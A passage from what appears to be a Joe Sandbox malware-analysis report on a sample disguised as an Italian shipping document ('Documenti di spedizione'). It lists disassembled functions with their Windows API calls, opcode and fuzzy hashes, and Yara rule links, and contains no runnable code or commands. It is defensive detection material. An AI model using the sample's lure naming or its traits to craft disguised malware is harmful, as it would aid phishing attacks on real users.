                        Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                        Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                        Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 00472B63
                        • GetDC.USER32(00000000), ref: 00472B6C
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                        Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 00472BB2
                        • GetDC.USER32(00000000), ref: 00472BBB
                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                        Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                        Download Yara Rule
                        APIs
                        • __getptd_noexit.LIBCMT ref: 00415150
                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                        • __freeptd.LIBCMT ref: 0041516B
                        • ExitThread.KERNEL32 ref: 00415173
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                        • String ID:
                        • API String ID: 1454798553-0
                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                        Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _strncmp
                        • String ID: Q\E
                        • API String ID: 909875538-2189900498
                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                        Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                        Download Yara Rule
                        APIs
                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 2652923123-3941886329
                        • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                        • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                        Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove_strncmp
                        • String ID: U$\
                        • API String ID: 2666721431-100911408
                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                        Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • __wcsnicmp.LIBCMT ref: 00467288
                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                        • String ID: LPT
                        • API String ID: 3035604524-1350329615
                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                        Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: \$h
                        • API String ID: 4104443479-677774858
                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                        Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID: &
                        • API String ID: 2931989736-1010288
                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                        Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: \
                        • API String ID: 4104443479-2967466578
                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                        Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00466825
                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CrackInternet_wcslen
                        • String ID: |
                        • API String ID: 596671847-2343686810
                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                        Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                        Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • _strlen.LIBCMT ref: 0040F858
                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                        • _sprintf.LIBCMT ref: 0040F9AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove$_sprintf_strlen
                        • String ID: %02X
                        • API String ID: 1921645428-436463671
                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                        Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                        Strings
                        Memory Dump Source
